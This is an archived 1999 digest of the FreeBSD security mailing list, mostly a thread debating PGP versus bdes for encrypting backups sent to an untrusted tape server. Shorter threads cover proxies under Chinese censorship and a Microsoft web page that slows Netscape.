/\ **** Isaac D. Kishk - IDK5 - zippo@io.com *** | **** / \ *** Senior Network / Systems Administrator ** | *** / () \ ** http://www.io.com/~zippo **************** | ** /______\ * 512.462.0999 - 512.462.0356(fax) ******** | ******************************************************/ | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id D73E814CCD for ; Mon, 17 May 1999 06:18:22 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA02339; Mon, 17 May 1999 09:31:43 -0400 (EDT) Date: Mon, 17 May 1999 09:31:43 -0400 From: Adam Shostack To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517093143.B2322@weathership.homeport.org> References: <19990516223322.B1851@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Kris Kennaway on Mon, May 17, 1999 at 12:45:09PM +0930 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 17, 1999 at 12:45:09PM +0930, Kris Kennaway wrote: | On Sun, 16 May 1999, Adam Shostack wrote: | | > You're worried about errors on the tape, I presume? You could | > pipe the output of pgp through something that does redundant encoding, | > such that errors on the tape are recoverable outside the tape. There | > are some direct tradeoffs that you can find between bloat and | > recoverability; as you add bits, your odds of being able to | > reconstruct increase. | | Pipe the output of dump or tar or whatever you're using through bdes(1). You | don't need the overhead of PGP unless you want a trusted third party to read | the backup without knowing the encryption key. Pass the data through three | rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different | keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do | natively. Make the keys random, and stick those in a PGP file if you like. | | Hmm, there seems to be a void of any general-purpose tools which provide | error-correcting data encoding - but in this case do you really need it? | It'll only multiply the size of your backup, and if you're using a reliable | transport protocol between client and server (i.e. TCP) then this shouldn't be | an issue. If your tape is dropping bits, then it would be a big problem if you | were using it in the normal way (attached to local computer). I suppose the | untrusted server could cause your data stream to be corrupted, but they could | also cause it to never make the tape in the first place. If the tape is unreliable, and you lose a few bits of a plaintext file, you've lost a few bits. If its a few bits of an encrypted and compressed file, you may lose the whole file. | ther server and modify it to nullify ANY authentication measures (easy if this | is a shell script) - so you can't really be sure that no-one else is writing | data onto the tape, only that the data you do write which ends up on the tape | is secure from decryption. No, if you use pgp, you can sign the data on your local (trusted) machine, and only be vulnerable to a DOS attack, not authentication attacks. | In summary, there's only so much you can do if you don't trust the server - | you still have to trust them to provide basic functions like actually writing | your data to the tape. This is correct. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:20:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 0CD701515E for ; Mon, 17 May 1999 06:20:29 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id WAA26306; Mon, 17 May 1999 22:50:28 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA31149; Mon, 17 May 1999 22:51:17 +0930 Date: Mon, 17 May 1999 22:51:14 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: "Jeroen C. van Gelderen" Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <373FEC63.D579485D@vangelderen.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > Kris Kennaway wrote: > > > > On Sun, 16 May 1999, Adam Shostack wrote: > > > > > You're worried about errors on the tape, I presume? You could > > > pipe the output of pgp through something that does redundant > > > encoding, such that errors on the tape are recoverable outside > > > the tape. There are some direct tradeoffs that you can find > > > between bloat and recoverability; as you add bits, your odds > > > of being able to reconstruct increase. > > > > Pipe the output of dump or tar or whatever you're using through > > bdes(1). You don't need the overhead of PGP unless you want a > > trusted third party to read the backup without knowing the > > encryption key. > > PGP provides a password based encryption mode, just use that, you will > still benefit from PGPs compression and checksumming facilities. Didn't know that. What cipher does it use? > > Pass the data through three > > rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different > > keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do > > natively. Make the keys random, and stick those in a PGP file if you like. > > If you assume PGP is available, why not just use it? Using bdes(1) in > this setup sounds way more complicated (thus error-prone) to me. There's no /need/ to use PGP in this step - clearly you could do anything you like with the local keys, such as printing them out, or storing them as plaintext (or keeping a constant key used for multiple backups). > > Transport the data stream to the server using ssh -c none (no need for the > > overhead of another encryption layer unless you're really paranoid) > > Just being cautious is enough. Adding a layer of SSH encryption will at > least twarth offline dictionary attacks on the backup passphrase. > Encryption is cheap, why disable it if you don't have to? If you use a random passphrase as in my suggestion then dictionary attacks are worthless and you're only vulnerable to an (expensive) brute force keyspace search. Encrypting the already encrypted stream doesn't buy you anything I can see, except the extra CPU time. But it's not a big deal. Kris > > Cheers, > Jeroen > -- > Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE > ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:38:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 8374914F8E for ; Mon, 17 May 1999 06:38:26 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA26566; Mon, 17 May 1999 23:08:25 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA23054; Mon, 17 May 1999 23:09:13 +0930 Date: Mon, 17 May 1999 23:09:09 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Adam Shostack Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <19990517093143.B2322@weathership.homeport.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Adam Shostack wrote: > If the tape is unreliable, and you lose a few bits of a plaintext > file, you've lost a few bits. If its a few bits of an encrypted and > compressed file, you may lose the whole file. Yes, but the question is whether tapes do this at all. The normal use of a backup tape (preserving a perfect copy of everything you send to it) is ruined if tapes are dropping bits - I don't think you'd see this unless your hardware was bad, in which case any relatively lightweight encoding method is likely to be in trouble too. The best you could do to guard against this would be to either run your encrypted data stream through an error-correcting code filter (I don't know of any tools which can do this, but it's not hard to write), or break up your input into blocks and encrypt them separately (or use the DES ECB mode). > | ther server and modify it to nullify ANY authentication measures (easy if this > | is a shell script) - so you can't really be sure that no-one else is writing > | data onto the tape, only that the data you do write which ends up on the tape > | is secure from decryption. > > No, if you use pgp, you can sign the data on your local (trusted) > machine, and only be vulnerable to a DOS attack, not authentication > attacks. I was talking about authentication for access to the tape server process itself (preventing other people from writing onto your tape). You're correct about PGP - it's probably better to use PGP instead of bdes (or equivalent symmetric encryption filter) for this reason - verification that your data stream was read back intact (and assuming perfect retrieval, was stored intact) when you restore. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:43: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 666D015094 for ; Mon, 17 May 1999 06:43:03 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:48914 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8063-32304>; Mon, 17 May 1999 15:42:53 +0200 Message-ID: <37401CDF.CEFA8B53@vangelderen.org> Date: Mon, 17 May 1999 15:42:55 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > PGP provides a password based encryption mode, just use that, you will > > still benefit from PGPs compression and checksumming facilities. > > Didn't know that. What cipher does it use? This feature has been available since PGP's early days. It uses PGP's default symmetric cipher. > > > Pass the data through three > > > rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different > > > keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do > > > natively. Make the keys random, and stick those in a PGP file if you like. > > > > If you assume PGP is available, why not just use it? Using bdes(1) in > > this setup sounds way more complicated (thus error-prone) to me. > > There's no /need/ to use PGP in this step - clearly you could do anything you > like with the local keys, such as printing them out, or storing them as > plaintext (or keeping a constant key used for multiple backups). I realize that. But using bdes(1) when you have PGP available is not a very good idea. Using bdes(1) actually never is a good idea because of it's crappy key handling (no hashing). bdes(1) allows you to shoot yourself in the foot without you realizing it. > > > Transport the data stream to the server using ssh -c none (no need for the > > > overhead of another encryption layer unless you're really paranoid) > > > > Just being cautious is enough. Adding a layer of SSH encryption will at > > least twarth offline dictionary attacks on the backup passphrase. > > Encryption is cheap, why disable it if you don't have to? > > If you use a random passphrase as in my suggestion then dictionary attacks are > worthless and you're only vulnerable to an (expensive) brute force keyspace > search. Encrypting the already encrypted stream doesn't buy you anything I can > see, except the extra CPU time. But it's not a big deal. Uhm, a dose of reality here: how many people will pick random passphrases of sufficient length? There is almost never reason to disable SSH encryption. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:57:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 273F9153B9 for ; Mon, 17 May 1999 06:57:07 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id HAA10030; Mon, 17 May 1999 07:57:04 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3740202F.347223FA@softweyr.com> Date: Mon, 17 May 1999 07:57:03 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Kiril Mitev Cc: freebsd-security@FreeBSD.ORG Subject: Re: network scan? References: <199905171304.OAA01246@idea.co.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kiril Mitev wrote: > > > Wes Peters wrote: > > > > Harold Gutch wrote: > > > > > > Just to make sure I'm getting this right - you're saying China > > > has a censored internet gateway (i.e. blocking *something* [what > > > exactly ?] ), but they do allow connections to ports 1080, 3128 > > > and 8080 ? > > > > They block access to sites, not to ports. In particular, sites that > > carry capitalist misinformation, or what we in the free world call > > "news." > > Hmm, but who can tell where EXACTLY *they* are trying to go to ? As in, > can you see things like 'www.abc.com' and such ? Or is more like > along the lines of www.max-XXX.org - you get the idea ? Not unless you have a proxy up, no. But I do see where you're going. My response *must* be "Get your mind out of the gutter (so mine can float by.)" ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:59:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 4F014152CE for ; Mon, 17 May 1999 06:59:32 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA02583; Mon, 17 May 1999 10:12:52 -0400 (EDT) Date: Mon, 17 May 1999 10:12:52 -0400 From: Adam Shostack To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517101251.A2526@weathership.homeport.org> References: <19990517093143.B2322@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Kris Kennaway on Mon, May 17, 1999 at 11:09:09PM +0930 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 17, 1999 at 11:09:09PM +0930, Kris Kennaway wrote: | On Mon, 17 May 1999, Adam Shostack wrote: | | > If the tape is unreliable, and you lose a few bits of a plaintext | > file, you've lost a few bits. If its a few bits of an encrypted and | > compressed file, you may lose the whole file. | | Yes, but the question is whether tapes do this at all. The normal use of a | backup tape (preserving a perfect copy of everything you send to it) is ruined | if tapes are dropping bits - I don't think you'd see this unless | your hardware was bad, in which case any relatively lightweight | encoding method is likely to be in trouble too. The other way this can happen is over extended (5-10 years) time periods; if you're planning to have your backups have a shelf life of N years, you may want to worry about tape degridation. | The best you could do to guard against this would be to either run your | encrypted data stream through an error-correcting code filter (I | don't know of | any tools which can do this, but it's not hard to write), or break up your | input into blocks and encrypt them separately (or use the DES ECB mode). There are better ways to get error recovery than ECB mode ciphers; CBC will recover from errors with a few blocks of lossage. My concern would be if you lose bits in the message headers, your ability to decrypt may disappear entirely. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7: 2:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 93C4D1522D for ; Mon, 17 May 1999 07:02:48 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA26602; Mon, 17 May 1999 23:32:47 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA07121; Mon, 17 May 1999 23:33:36 +0930 Date: Mon, 17 May 1999 23:33:34 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: "Jeroen C. van Gelderen" Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <37401CDF.CEFA8B53@vangelderen.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > This feature has been available since PGP's early days. It uses PGP's > default symmetric cipher. Which is what? I don't have PGP handy here.. > > > If you assume PGP is available, why not just use it? Using bdes(1) in > > > this setup sounds way more complicated (thus error-prone) to me. > > > > There's no /need/ to use PGP in this step - clearly you could do anything you > > like with the local keys, such as printing them out, or storing them as > > plaintext (or keeping a constant key used for multiple backups). > > I realize that. But using bdes(1) when you have PGP available is not a > very good idea. Using bdes(1) actually never is a good idea because of > it's crappy key handling (no hashing). bdes(1) allows you to shoot > yourself in the foot without you realizing it. Can you elaborate on this? Apart from the fact that bdes expects keys to be given on the command line for non-interactive use (and not taken from a file, which should be an easy hack to make), what's wrong with it? > > If you use a random passphrase as in my suggestion then dictionary attacks are > > worthless and you're only vulnerable to an (expensive) brute force keyspace > > search. Encrypting the already encrypted stream doesn't buy you anything I can > > see, except the extra CPU time. But it's not a big deal. > > Uhm, a dose of reality here: how many people will pick random > passphrases of sufficient length? There is almost never reason to > disable SSH encryption. Yes, but the original problem related to a non-interactive tape backup. There is no reason to have the encryption key as a human-memorable phrase; on the contrary it's much better to make it a machine-generated random string of the sufficient length. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:15:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id EBF7D14BE2 for ; Mon, 17 May 1999 07:15:33 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1356 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 17 May 1999 08:56:10 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Mon, 17 May 1999 08:55:55 -0500 (CDT) From: James Wyatt To: Ludwig Pummer Cc: Wes Peters , freebsd-security@FreeBSD.ORG Subject: Re: warning concerning a public proxy [was Re: network scan?] In-Reply-To: <4.1.19990516173306.00a7fa20@mail-r> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 16 May 1999, Ludwig Pummer wrote: [ ... ] > Setting up a public proxy might feel real good, but it won't any more after > @Home cancels your account. Worse than that: when they disconnect you, your install fees are kept and you have useless hardware worth less than you paid. With xDSL you can usually switch to another ISP. I know of several folks who left the ISP I worked for, did something that hacked-of (not hacked 8{) the @home admins, and came back rather quickly. Typically it's a Quake server or a small FTP server for their digital camera pictures for relatives. One was a warez/MP3 site and we wouldn't like those either when the lawyers visited. Have fun... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:16:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 7870715540 for ; Mon, 17 May 1999 07:16:48 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id IAA10086; Mon, 17 May 1999 08:16:33 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <374024BF.3EAD1892@softweyr.com> Date: Mon, 17 May 1999 08:16:31 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: nr1@ihug.co.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: <199905170014.MAA18766@smtp1.ihug.co.nz> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nr1@ihug.co.nz wrote: > > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. Can Amanda help with something like this? Perhaps if you fed it an encryption program instead of a compression program? Does Amanda have the ability to encrypt files as they are backed up? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:23:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 7515815469 for ; Mon, 17 May 1999 07:23:28 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:32787 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8068-32302>; Mon, 17 May 1999 16:23:14 +0200 Message-ID: <37402654.EE74B389@vangelderen.org> Date: Mon, 17 May 1999 16:23:16 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > > > This feature has been available since PGP's early days. It > > uses PGP's default symmetric cipher. > > Which is what? I don't have PGP handy here.. IIRC IDEA for the 2.x series. CAST5 (default), TripleDES or IDEA for the 5.x/6.x versions. > > I realize that. But using bdes(1) when you have PGP available is not a > > very good idea. Using bdes(1) actually never is a good idea because of > > it's crappy key handling (no hashing). bdes(1) allows you to shoot > > yourself in the foot without you realizing it. > > Can you elaborate on this? Apart from the fact that bdes expects keys to be > given on the command line for non-interactive use (and not taken from a file, > which should be an easy hack to make), what's wrong with it? The problem is the people that use it: they pick non-random passwords. If you are *very* lucky, a password has 6 bits of entropy per character, you can only enter 8 characters -> 48 bits. This assumes a random distribution over 64 characters, quite unlikely. One (partial) solution is to accept longer passphrases, hashing them down to 56 bits of DES key. If you use a cryptographically strong hash function (SHA-1) it will preserve the entropy from the given password. Another advantage of this approach is that you can introduce salt and/or multiple hashing to slow down brute force attacks. And -chances are small but not non-existent- it is possible to choose DES weak keys, something that PGP automatically avoids for you. PGP delivers all these 'advanced' techniques in a reputable program. So you'd better benefit from all the expertise that's been put into PGP than invent yourself a scheme. > > > If you use a random passphrase as in my suggestion then dictionary attacks are > > > worthless and you're only vulnerable to an (expensive) brute force keyspace > > > search. Encrypting the already encrypted stream doesn't buy you anything I can > > > see, except the extra CPU time. But it's not a big deal. > > > > Uhm, a dose of reality here: how many people will pick random > > passphrases of sufficient length? There is almost never reason to > > disable SSH encryption. > > Yes, but the original problem related to a non-interactive tape backup. There > is no reason to have the encryption key as a human-memorable phrase; on the > contrary it's much better to make it a machine-generated random string of the > sufficient length. How many people do this? You will have to restore the backup at some point in the future. And at that point in time, access to the vault (where the paper with the passwords is) may not be available. There's a subtle difference between theory and practice here. Cheers, Jeroen PS. s/PGP/GnuPG/ if you want. -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:33:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id 767B314F4C for ; Mon, 17 May 1999 07:33:35 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id HAA14552 for ; Mon, 17 May 1999 07:33:36 -0700 (PDT) Date: Mon, 17 May 1999 07:33:33 -0700 (PDT) From: Roger Marquis X-Sender: Roger Marquis Reply-To: Roger Marquis To: security@FreeBSD.ORG Subject: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone attempted to browse: http://microsoft.com/NTServer/all/Downloads.asp using Netscape Navigator and noticed what seems to be an HTML denial of service? I've tested this page with Javascript on and off, Java on and off, cookies on and off, stylesheets off, under FreeBSD, Linux and Solaris and the behavior is consistent: * Navigator freezes for several seconds * CPU utilization climbs briefly to near 100% * memory usage climbs by 11MB * the 11MB or memory are not released even after leaving the page and clearing disk and RAM caches. The page shows two possible sources for this extremely unusual browser behavior: Using lynx to downloaded the jscripts.js and Netscape.css scripts there is, as expected, a good deal of browser-specific code. Is there a csslint or javascript debugging utility which might identify this Unix-Netscape specific problem? -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 8: 3:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 412FB14E96 for ; Mon, 17 May 1999 08:03:26 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id LAA07870; Mon, 17 May 1999 11:03:14 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14144.12209.672779.906741@trooper.velocet.ca> Date: Mon, 17 May 1999 11:03:13 -0400 (EDT) To: Roger Marquis Cc: security@FreeBSD.ORG Subject: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp) In-Reply-To: References: X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Roger" == Roger Marquis writes: Roger> Has anyone attempted to browse: Roger> http://microsoft.com/NTServer/all/Downloads.asp My machine definately takes a few seconds to render the page, and I never have javascript on. One thing to note is that you *can't* turn javascript off in Netscape 4.5 (even if you think you did). I've got the linux 4.51 netscape on FreeBSD-3.0 Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 10:38:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 6A90114D92 for ; Mon, 17 May 1999 10:38:44 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.8.8+Sun/SMI-SVR4) id TAA00614; Mon, 17 May 1999 19:38:29 +0200 (MET DST) Received: from sziszi by petra.hos.u-szeged.hu with local-smtp (Exim 2.05 #1 (Debian)) id 10jRVq-0000o8-00; Mon, 17 May 1999 19:49:14 +0200 Date: Mon, 17 May 1999 19:49:14 +0200 (CEST) From: Adam Szilveszter Reply-To: Adam Szilveszter To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! My experinece upon looking at the page in question: - With my FreeBSD box, running Netscape 4.6 (freebsd) it took about half a minute to display the page, the communicator process actually used almost all available RAM and a lot of CPU time. However, after exiting Communicator, I got back the RAM (it says now: 26M Free), the amount that has already been swapped out remains in place. -After this I checked the same page from the same subnet with a W95 machine running Netscape 4.51 and M$ Internet Explorer 5. (That machine has only 32M RAM, though, whereas mine has 64M) The results with Netscape: It took the browser an incredible almost two minutes to display the page. (!) it first displayed the toolbar only and the two minutes are from when it appeared till the whole page was visible. There was a lot of HDD activity going on at some times. I could see the words: Version-4.51[en]-xxxx on the title bar (xxxx stands for some numbers. I did not remember.) during the rendering process. With IE, the page came up swiftly (10-15sec) but this actually is a different page IMHO in what techniques it uses. E.g. I'd bet on it, that it uses no normal JavaScript but M$ implementation JScript for IE. I even tried with StarOffice and the page displayed very quickly. It received the Netscape version. (No 3D buttons) From this I draw the conclusion that: 1) This problem is not UNIX specific, rather Netscape related. 2) FreeBSD actually did quite well, as you could see (30 sec rendering time as opposed to 2 min on W95) 